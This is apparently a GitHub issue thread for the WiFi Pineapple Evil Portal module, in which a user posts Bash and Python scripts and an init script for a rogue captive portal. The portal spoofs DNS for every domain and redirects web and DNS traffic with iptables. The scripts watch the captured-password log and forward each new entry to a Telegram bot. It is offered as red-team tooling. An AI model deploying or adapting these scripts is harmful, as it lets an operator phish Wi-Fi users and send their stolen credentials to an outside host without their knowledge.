vay3t commented 2 years ago

Short story: Send captured credentials to telegram bot

A couple of years ago I made a bash script that helped me do a hot read of a file and every time that file was updated it sent a message from the telegram bot (https://vay3t.medium.com/creando-un-notificador-en-telegram-con-bash-b842490610)

With that idea I molded it to use it in the wifi pineapple and in this way have telegram notifications for red team campaigns.

/root/notify.sh

#!/bin/bash

function urlencode() {
        # urlencode <string>
        old_lc_collate=$LC_COLLATE
        LC_COLLATE=C
        local length="${#1}"
        for (( i = 0; i < length; i++ )); do
                local c="${1:$i:1}"
                case $c in
                        [a-zA-Z0-9.~_-]) printf '%s' "$c" ;;
                        *) printf '%%%02X' "'$c" ;;
                esac
        done
        LC_COLLATE=$old_lc_collate
}

token="TOKENOFBOT"
id="IDUSER"

if [ "$1" != "" ]; then
        if [ ! -t 0 ]; then
                msj="$(cat $1)"
        fi
else
        msj="beep"
fi

msj=$(urlencode "$msj")
url="https://api.telegram.org/bot$token/sendMessage"
curl -s -X POST "$url" -d chat_id="$id" -d text="$msj" &> /dev/null
if [ $? -ne 0 ]; then
        echo "Error with bot"
fi

/root/hotreader.sh

#!/bin/bash

file="/www/.logs"
lines=$(cat $file | wc -l)
###while inotifywait -q -e modify $file; do
inotifywait -q -m -e modify $file | while read filename event; do
        linesNow=$(cat $file | wc -l)
        tail -n $(($linesNow-$lines)) $file > /tmp/out.out && bash /root/notify.sh /tmp/out.out
        lines=$linesNow
done

/etc/init.d/evilportal

#!/bin/sh /etc/rc.common

# This is the auto-start script for EvilPortal

START=200

start() {
    # Enable ip forward.
    echo 1 > /proc/sys/net/ipv4/ip_forward

    # Remove old authorized clients list
    rm /tmp/EVILPORTAL_CLIENTS.txt

    /etc/init.d/php7-fpm start
    /etc/init.d/nginx start

    # Start DNS MASQ to spoof * for unauthorized clients
    dnsmasq --no-hosts --no-resolv --address=/#/172.16.42.1 -p 5353

    # Symlink evilportal portal api
    rm /www/captiveportal
    ln -s /pineapple/ui/modules/evilportal/assets/api /www/captiveportal

    # Run iptables commands
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 443 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    iptables -t nat -A PREROUTING -i br-lan -p udp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    sleep 10
    bash /root/hotreader.sh &
}

stop() {
    /etc/init.d/php7-fpm stop
    /etc/init.d/nginx stop

    kill $(netstat -plant | grep 5353 | awk '{print $NF}' | sed 's/\/dnsmasq//g' | head -n 1)

    rm /www/captiveportal
    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 443 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    iptables -t nat -D PREROUTING -i br-lan -p udp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    kill $(ps aux | grep hotreader.sh | head -2 | awk '{print $2}')
}

disable() {
    rm /etc/rc.d/*evilportal
    kill $(ps aux | grep hotreader.sh | head -2 | awk '{print $2}')
}

I would like to work more but I'm not very good at developing web applications

Notes:

The log file of the captured passwords should be blocked with an htaccess or any type of protection to the public from the web.
It is possible that my solution is vulnerable to RCE due to the nature of Bash, but I think that using Python would be a good alternative

vay3t commented 2 years ago

Python solution

req.txt

opkg install python3-pyinotify

/root/notify.py

import urllib.request
import urllib.parse
import sys
import pyinotify
import os.path

global lines

file_watcher = os.path.realpath("/www/.logs")

def count_lines(file_name):
    with open(file_name) as f:
        count = len(f.readlines())
    return count

def tail_n(file_name, n):
    with open(file_name) as f:
        lines = f.readlines()
    return lines[-n:]

def list2string(list):
    return "".join(list)

def sender(msj):
    if msj == "":
        msj = "[EvilPortal]"

    token = "<TOKEN>"
    chat_id = "<CHAT_ID>"

    url = f"https://api.telegram.org/bot{token}/sendMessage"

    values = {
        "chat_id": chat_id,
        "text": msj
    }

    data = urllib.parse.urlencode(values)
    data = data.encode('ascii')
    req = urllib.request.Request(url, data)
    urllib.request.urlopen(req)

# Example: monitors transient files.
#
# Run this code, then run transient_file.sh in another shell.

class ProcessTransientFile(pyinotify.ProcessEvent):

    def process_IN_MODIFY(self, event):
        global lines
        # We have explicitely registered for this kind of event.
        #print('\t', event.pathname, ' -> written')
        lines_now = count_lines(file_watcher)
        modified = tail_n(file_watcher, lines_now - lines)
        print(list2string(modified))
        lines = lines_now
        sender(list2string(modified))

    def process_default(self, event):
        # Implicitely IN_CREATE and IN_DELETE are watched too. You can
        # ignore them and provide an empty process_default or you can
        # process them, either with process_default or their dedicated
        # method (process_IN_CREATE, process_IN_DELETE) which would
        # override process_default.
        print('default: ', event.maskname)

lines = count_lines(file_watcher)

wm = pyinotify.WatchManager()
notifier = pyinotify.Notifier(wm)
# In this case you must give the class object (ProcessTransientFile)
# as last parameter not a class instance.
wm.watch_transient_file(file_watcher, pyinotify.IN_MODIFY, ProcessTransientFile)
notifier.loop()

/etc/init.d/evilportal

#!/bin/sh /etc/rc.common

# This is the auto-start script for EvilPortal

START=200

start() {
    # Enable ip forward.
    echo 1 > /proc/sys/net/ipv4/ip_forward

    # Remove old authorized clients list
    rm /tmp/EVILPORTAL_CLIENTS.txt

    /etc/init.d/php7-fpm start
    /etc/init.d/nginx start

    # Start DNS MASQ to spoof * for unauthorized clients
    dnsmasq --no-hosts --no-resolv --address=/#/172.16.42.1 -p 5353

    # Symlink evilportal portal api
    rm /www/captiveportal
    ln -s /pineapple/ui/modules/evilportal/assets/api /www/captiveportal

    # Run iptables commands
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 443 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    iptables -t nat -A PREROUTING -i br-lan -p udp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    sleep 10
    python3 /root/notify.py &
}

stop() {
    /etc/init.d/php7-fpm stop
    /etc/init.d/nginx stop

    kill $(netstat -plant | grep 5353 | awk '{print $NF}' | sed 's/\/dnsmasq//g' | head -n 1)

    rm /www/captiveportal
    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 443 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    iptables -t nat -D PREROUTING -i br-lan -p udp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    kill $(ps aux | grep notify.py | head -2 | awk '{print $2}')
}

disable() {
    rm /etc/rc.d/*evilportal
}

EduardoDesdes commented 2 years ago

weeeeeeeeena bayeton xuxetumare!!!

gvillegass commented 2 years ago

buena manito

hak5 / pineapple-modules

[Evil Portal] Feature Request: notify-ng #54

Python solution